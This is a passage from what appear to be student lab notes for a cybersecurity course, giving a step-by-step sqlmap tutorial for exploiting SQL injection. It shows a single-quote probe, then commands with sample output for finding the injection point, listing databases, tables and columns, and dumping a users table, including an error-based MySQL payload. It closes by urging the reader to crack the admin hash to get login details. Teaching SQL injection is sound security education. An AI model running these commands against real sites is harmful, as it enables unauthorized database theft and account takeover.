parameter id. This can be simply tested by trying to open the url

http://www.site.com/section.php?id=51'

We just added a single quote in the parameter. If this url throws an error or reacts in an
unexpected manner then it is clear that the database has got the unexpected single quote
which the application did not escape properly. So in this case this input parameter "id" is
vulnerable to sql injection.

2) Hacking with sqlmap

Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the
terminal with the python interpreter.

python sqlmap.py -u "http://www.site.com/section.php?id=51"

The above is the first and most simple command to run with the sqlmap tool. It checks the
input parameters to find if they are vulnerable to sql injection or not. For this sqlmap sends
different kinds of sql injection payloads to the input parameter and checks the output. In the
process sqlmap is also able to identify the remote system os, database name and version. Here
is how the output might look like

[*] starting at 12:10:33

[12:10:33] [INFO] resuming back-end DBMS 'mysql'

[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET

[Enrollment No] Page 77

Cyber Security 3150714

Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT
COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE
0
END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) ---

[12:10:37] [INFO] the back-end DBMS is MySQL

web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

So the sqlmap tool has discovered the operating system, web server and database along with
version information. Even this much is pretty impressive. But its time to move on and see
what more is this tool capable of.

3) Discover Databases

Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the
next step is to find out the names of the databases that exist on the remote system. The "--
dbs" option is used to get the database list.

$ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs

The output could be something like this

[*] starting at 12:12:56

[12:12:56] [INFO] resuming back-end DBMS 'mysql'

[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT
COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE
0
END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) ---

[12:13:00] [INFO] the back-end DBMS is MySQL

web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

[Enrollment No] Page 78

Cyber Security 3150714

[12:13:00] [INFO] fetching database names

[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[ information_schema
[ safecosmetics

The output shows the existing databases on the remote system.

4) Find tables in a particular database

Now its time to find out what tables exist in a particular database. Lets say the database of
interest over here is 'safecosmetics'

Command

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D

safecosmetics

and the output can be something similar to this

[11:55:18] [INFO] the back-end DBMS is MySQL

web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
........... more tables

isnt this amazing ? it if ofcourse. Lets get the columns of a particular table now.

5) Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of
some important table. Lets say the table is 'users' and it contains the username and password.

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D

safecosmetics -T users

The output can be something like this

[12:17:39] [INFO] the back-end DBMS is MySQL

web server operating system: FreeBSD

[Enrollment No] Page 79

Cyber Security 3150714

web application technology: Apache 2.2.22

back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text

.......

[12:17:59] [INFO] retrieved: hash

[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+------------------- +-------------- +
| Column | Type |
+------------------- +-------------- +
| email | text |
| hash | varchar(128) |
| id | int(11) |
| name | text |
| password | text |
| permission | tinyint(4) |
| system_allow_only | text |
| system_home | text |
+------------------- +-------------- +

So now the columns are clearly visible. Good job!

6) Get data from a table

Now comes the most interesting part, of extracting the data from the table. The command
would be

[Enrollment No] Page 80

Cyber Security 3150714

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D

safecosmetics - T users

The above command will simply dump the data of the particular table, very much like the
mysqldump command. The output might look similar to this

+---- +-------------------- +----------- +----------- +----------+------------ +------------- +------------------- +

| id | hash | name | email | password | permission | system_home |
system_allow_only |
+---- +-------------------- +----------- +----------- +----------+------------ +------------- +------------------- +
| 1 | 5DIpzzDHFOwnCvPonu | admin | <blank> | <blank> | 3 | <blank> | <blank>
|
+---- +-------------------- +----------- +----------- +----------+------------ +------------- +------------------- +

The hash column seems to have the password hash. Try cracking the hash and then you
would get the login details rightaway. sqlmap will create a csv file containing the dump data
for easy analysis.

[Enrollment No] Page 81